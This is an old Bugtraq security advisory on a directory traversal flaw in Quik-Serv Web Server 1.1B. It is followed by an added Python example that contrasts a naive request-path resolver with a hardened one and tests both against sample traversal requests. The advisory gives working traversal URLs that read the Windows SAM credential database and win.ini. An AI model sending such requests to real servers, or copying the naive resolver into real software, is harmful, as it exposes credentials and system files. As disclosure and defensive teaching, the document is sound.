[24955] in bugtraq
Quik-Serv Web Server v1.1B Arbitrary File Disclosure
daemon@ATHENA.MIT.EDU (a b)
Wed Apr 3 21:31:46 2002
From: "a b" <p0pt4rtz@hotmail.com>
To: bugtraq@securityfocus.com
Date: Wed, 03 Apr 2002 13:20:44 -0800
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F165rSByh133tYwlib4000002c0@hotmail.com>
Quik-Serv Web Server v1.1B Arbitrary File Disclosure

Abstract:
Quik-Serv Web Server is a small web server with built-in CGI support.
The server is vulnerable to a directory traversal that allows a remote
user to display arbitrary files.

Exploit:
To display the SAM database:
http://server/../../../winnt/repair/sam
To display the win.ini file:
http://server/../../../winnt/win.ini

Workaround:
Install packet filtering systems, wait for a fix, or don't even use
the product.

Vendor Status:
The vendor has been contacted, but no reply was received.

--
p0p t4rtz
p0pt4rtz@hotmail.com
NetCra$h Security Research Team
http://www26.brinkster.com/netcrash/
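
Added example (not part of the original advisory, and not Quik-Serv code): the request-path check whose absence produces this class of bug, shown as the flawed pattern beside a hardened one. The document root, function names and sample requests are assumptions constructed for illustration.

```python
import os
from urllib.parse import unquote

# Hypothetical document root (assumption; the advisory does not name one).
DOC_ROOT = os.path.realpath("/srv/www/site")


def naive_resolve(url_path, root=DOC_ROOT):
    """Flawed pattern: glue the request path onto the root unchecked."""
    return os.path.normpath(root + "/" + url_path)


def safe_resolve(url_path, root=DOC_ROOT):
    """Return the file path to serve, or None when the request is refused."""
    path = unquote(url_path)           # decode once, *before* any check
    if "\x00" in path:                 # NUL can truncate paths in native APIs
        return None
    path = path.replace("\\", "/")     # Windows accepts both separators
    # Canonicalise (collapses "..", follows symlinks), then require that the
    # result is still inside the document root.
    candidate = os.path.realpath(os.path.join(root, path.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


# Constructed sample requests: one legitimate, the rest traversal variants.
SAMPLES = [
    "/index.html",
    "/docs/../index.html",                  # ".." that stays inside the root
    "/../../../winnt/win.ini",              # form shown in the advisory
    "/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini",  # percent-encoded dots
    "/..\\..\\..\\winnt\\win.ini",          # backslash separators
]


def check_samples():
    """Map each sample request to the path served, or None if refused."""
    return {s: safe_resolve(s) for s in SAMPLES}


if __name__ == "__main__":
    for request, served in check_samples().items():
        print(f"{request!r:45} -> {served}")
```

The containment test runs on the canonical path, so a request containing ".." is still served when it resolves inside the root, and refused only when it escapes it.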